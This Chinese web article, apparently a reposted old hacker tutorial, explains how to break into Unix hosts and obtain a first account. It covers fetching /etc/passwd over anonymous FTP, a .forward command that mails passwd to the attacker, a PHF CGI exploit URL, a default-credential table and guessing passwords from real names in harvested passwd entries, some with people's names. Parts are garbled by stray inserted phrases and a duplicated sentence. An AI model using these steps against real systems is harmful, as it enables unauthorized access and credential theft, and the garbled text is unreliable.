网页怎么查看账号密码是什么？我来告诉你答案如何找回电脑的登录账号及密码

我们这种水平不高的黑客入侵，都是先获取系统的有效账号，然后利用系统bug获取root权限，或者想办法获取SHADOW进行解密。不管是利用系统漏洞还是获得SHADOW，都可以有规律地找到。一般可以去一些黑客网站，找到对应于该系统相应版本的EXPLOIT，然后编译。最难的是获得第一个有效账户。有时候努力也没有得到，后来终于积累了一些经验，想和大家沟通一下。希望能抛砖引玉。请告诉高手们更好的方法。

确定目标后，我一般会先看匿名FTP，很多网站打开匿名FTP，账号使用ANONYMOUS或FTP，密码使用电子邮件账号(当然是假的)进入/EMAIL目录，返回PASSWD。一般都是不完整的目录。(阿尔伯特爱因斯坦、Northern Exposure(美国电视剧)、Northern Exposure(美国电视剧)那么：-}但是有时候比较愚蠢的管理者会放普通账号，这是非常重要的信息。只有账户没有密码，但最终迈出了第一步。如果FTP主目录是drwxr-xr-x。创建foward文件并上传到联合国大学。(阿尔伯特爱因斯坦，Northern Exposure(美国电视剧)，Northern Exposure(美国电视剧))

/bin/cat/etc/passwd | sed ' s//' |/bin/mailme @ my . e-mail . addr '

.forward给匿名用户写信的话，会给他们发PASSWD。

如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些帐号,有的网页上甚至列出了EMAIL通讯录,这对黑客来讲就是无价之宝.把这些帐号记下来,非常有用.

以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://攻击目标/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-<

还可以利用目标的FINGER功能来积累帐号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了!

很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的帐号,例如:

帐号　　　　 密码

----------- ----------------

root　　　　root

sys　　　 　sys/system/bin

bin　　　　 sys/bin

mountfsys　 mountfsys

adm　　　　 adm

uucp　　　　uucp

nuucp　　　 anon

anon　　　　anon

user　　　　user

games　　　 games

install　　 install

reboot　　　给 "command login" 用的

demo　　　　demo

umountfsys　umountfsys

sync　　　　 sync

admin　　　 admin

guest　　　 guest

daemon　　　daemon

________________________________________________________________

有些管理员忘记把他们改掉,那你就发财了!

另外还有一些习惯性帐号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试.

只有帐号还不能进入系统,但有了帐号搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道帐号的那你应该会发现该用户的许多信息,例如:

.........

xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh

qingyuan:x:275:50::/usr/qingyuan:/bin/sh

hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh

smlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh

kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh

brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh

tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh

............

这是一部分PASSWD,从这儿我们可以得到七个帐号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的.

如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜">如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜.

当然最可能的密码还是帐号本身和一些帐号的变形,如帐号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的.

如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好.

弈安传媒科技微课堂,每天分享财经资讯,计算机技术知识,人生感悟,创业指导以及各种专业技术知识资料学习交流.移动学习平台、知识分享平台。随时随地的学习,如果你喜欢成长,这里你不容错过的地方.弈安传媒科技培训关注:关注自己成长,分享内容,分享自己的技术,成就未来.

[弈安传媒科技提升自己的平台]请关注:头条号及公众号 弈安传媒科技